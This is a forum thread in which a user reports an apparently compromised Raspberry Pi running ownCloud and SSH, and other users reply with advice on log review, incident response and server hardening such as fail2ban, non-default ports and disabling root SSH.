Owncloud server cracked


#1

Hi folks,

I've got a Pi that has been happily running my owncloud service for a few months. I also use it to allow SSH access to home so that I can access the rest of the house. I thought that I had secured it enough, with only the owncloud and SSH ports being allowed through my ASUS router/firewall.

I had SSH set up to use use protocol 2 and only allow publickey authentication.

However, last week I tried to SSH in but it failed. I coupled up a screen to the HDMI and plugged in a keyboard but could not get the screen to power up.

I tried debugging the SSH and confirmed that that was working fine. It looks like BASH is crashing on start-up.

Then tonight while trying again I got the following displayed (most of the SSH stuff has been cropped):

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 7 16:30:44 2016 from 5.79.246.43
debug1: client_input_channel_req: channel 0 rtype exit-signal reply 0
debug1: client_input_channel_req: channel 0 rtype eow@openssh.com reply 0
debug1: channel 0: free: client-session, nchannels 1
Connection to 192.168.1.62 closed.

The problem I have is that I have no idea who is on IP address 5.79.246.43 but it certainly isn't me.

I've shut down the Pi and removed the SD card. My questions are:

1) have I been cracked? I'm pretty certain the answer is YES
2) is there any way I can tell how? Was it SSH or was it Owncloud?
3) is there any way to tell what they've done on my machine, how much they've accessed and if they've used it to access anyone else?
4) Once I build a new Owncloud from a new image, what do I need to do to make that one safe?


#2

Hi,

i think that is a far too complex topic to handle in here. There are companies / jobs doing such incident response and computer forensics so you can see thats way too specific.

However you might be able to find some info on the net how to handle such situations:

https://mediatemple.net/community/products/dv/204644550/working-with-a-hacked-or-compromised-server


#3

Doesn't look that good: http://anti-hacker-alliance.com/index.php?ip=5.79.246.43


#4

You can configure your router to use a non standard port for ssh access, then port forward to your pi. /etc/ssh/ssh.config

Next set it to allow only users such as pi and yourusername as opposed to the default everyone.

Fail2ban and iptables set to scan your /var/log/auth

cat /var/log/auth | grep (IP-Address of intruder)

I had many hits from Asia in my auth log until I sorted this method out for better security over ssh.

I hope this helps.

With port forwarding your new command to access the pi would be:
ssh -p33333 pi@yourip


#5

1) have I been cracked? I'm pretty certain the answer is YES

Looking at the IP you posted, from Russian Federation, I'd say its conservative to assume you were hacked. At least, someone tried to gain access to your Pi..

2) is there any way I can tell how? Was it SSH or was it Owncloud?

Not without posting more logs here. SSH logs, apache logs, etc. Go thru these and look for incidents. Better next time setup fail2ban. At least if someone tries the hard way (brute force or manual attempts, it will get banned for a period of time). Im not a security expert, but access thru SSH would be possible only on the port sshd is listening for incoming connections. Please dont use standard ports (i.e. ssh=22) Use another random one. Disable root access from SSH. Create a dummy restricted user for SSH only THEN escalate to root if REALLY necessary. IMO, root SSH should be disabled by default.

3) is there any way to tell what they've done on my machine, how much they've accessed and if they've used it to access anyone else?

IMO the best bet is looking into your server's logs for attempted connections to other hosts/machines and look in your router/FW logs. Running a ASUS router will not protect you much. I highly recommend a pfsense appliance.

4) Once I build a new Owncloud from a new image, what do I need to do to make that one safe?

Not sure since we have very different topologies, but if it were me, Id do these 5 things:

1-Customize everything (ports, settings, etc) and avoid defaults (especially credentials!!!!)
2-Lock down everything you dont need and keep only minimal stuff open.
3-Get a better firewall or install a better firewall on your machine (firewalld, or iptables) and setup rkhunter+fail2ban
4-Segregate stuff. Dont host everything in the same machine/VM. If someone breaks in, they will have access to everything. If its segregated, they will have a harder time to access everything.
5-Last but not least, go thru some Debian hardening tutorials and best practices.


#6

If you configured that correctly, I think it is very unlikely that someone broke that. If someone manages to break in, he probably stole your key. Changing the default port only reduces the number of entries in your logfiles.

You can check the logfiles for hints but consider that if the attacker had full access, it would be easy to temper these data. Bash-history, content of /tmp-folder can give indications. Keep an image of your sd-card, then you can investigate anytime.

I consider SSH to be pretty secure, it's more likely your webserver or even a different service that was running on your server.

That is a good question. I suppose that you don't have very important data (such as Hillary's owncloud :smile:), so the hack was probably a quite obvious installation/configuration-problem ("low-hanging fruit"). A good and secure configuration should be your main focus. Use tools to verify the settings (check for running services with portscanner). You can follow guides for normal LAMP servers.